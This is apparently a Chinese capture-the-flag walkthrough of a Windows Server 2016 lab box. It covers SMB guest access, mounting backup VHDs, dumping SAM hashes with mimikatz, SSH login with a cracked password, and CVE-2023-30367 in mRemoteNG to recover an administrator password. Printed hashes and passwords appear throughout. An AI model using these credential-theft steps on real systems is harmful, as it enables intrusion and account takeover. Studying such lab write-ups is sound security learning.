信息搜集

PORT      STATE  SERVICE      VERSION
22/tcp    open   ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
25/tcp    closed smtp
110/tcp   closed pop3
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49668/tcp open   msrpc        Microsoft Windows RPC
49669/tcp open   msrpc        Microsoft Windows RPC
49670/tcp open   msrpc        Microsoft Windows RPC

入侵 & 驻足

smb guest登录策略

对smb进行枚举

开启了guest登录策略,随机的用户名都会映射为guest用户

发现备份文件夹

其中有个 note.txt 和 文件夹 WindowsImageBackup

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

系统管理员:请不要将整个备份文件传输到本地,到子公司的 VPN 太慢了。

挂载磁盘

有两个vhd文件,分别进行挂载,只有一个盘里有东西

转储 SAM & SYSTEM

先看看能不能把默认账密搞到手

利用mimikatz解密

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : L4mpje
  Hash NTLM: 26112010952d963c8dc4217daec986d9

拿到彩虹表查下

L4mpje:bureaulampje

openssh连接

ssh直接上去了

权限提升

上传winpeas

上传 winpeas 先进行一波收集,常见的攻击向量都没什么可用的

还有一个攻击向量是受攻击程序,但是用户权限太低了,连列出计算机安装的应用程序都做不到

我只能手动去翻翻Program Files了

利用受攻击软件 mRemoteNG CVE-2023-30367 获取管理员密码

mRemoteNG 是一个开源、多协议的远程连接管理器,支持多种远程连接协议,如 RDP(远程桌面)、VNC、SSH、Telnet 等。它通过集中化的管理界面,帮助用户快速组织和访问多台服务器或设备。

下载下来看看版本,1.76.11


请注意,配置密码加密和连接文件加密是不同的设置。配置密码加密仅用于加密配置文件中的密码,而连接文件加密用于加密整个配置文件本身。

此漏洞通过从内存中转储已解密的配置来绕过连接文件加密。但是不包含配置文件加密的密码(默认密钥 mR3m ),如果已设置自定义配置密码加密密钥/密码,攻击者仍必须猜测自定义密钥。(参见 mremoteng-decrypt.py 部分

确定加密的配置文件位置

l4mpje@BASTION C:\Users\L4mpje>dir c:\ /s /b | find "confCons.xml"                  
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1402277353.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1402339071.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1402379227.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1403070644.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1403100488.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1403220026.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1403261268.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1403272831.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1403433299.backup
c:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.20190222-1403486580.backup   

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

利用脚本:S1lkys/CVE-2023-30367-mRemoteNG-password-dumper: Original PoC for CVE-2023-30367 (github.com)

解密如下

administrator:thXLHM96BeKL0ER2

⬆︎TOP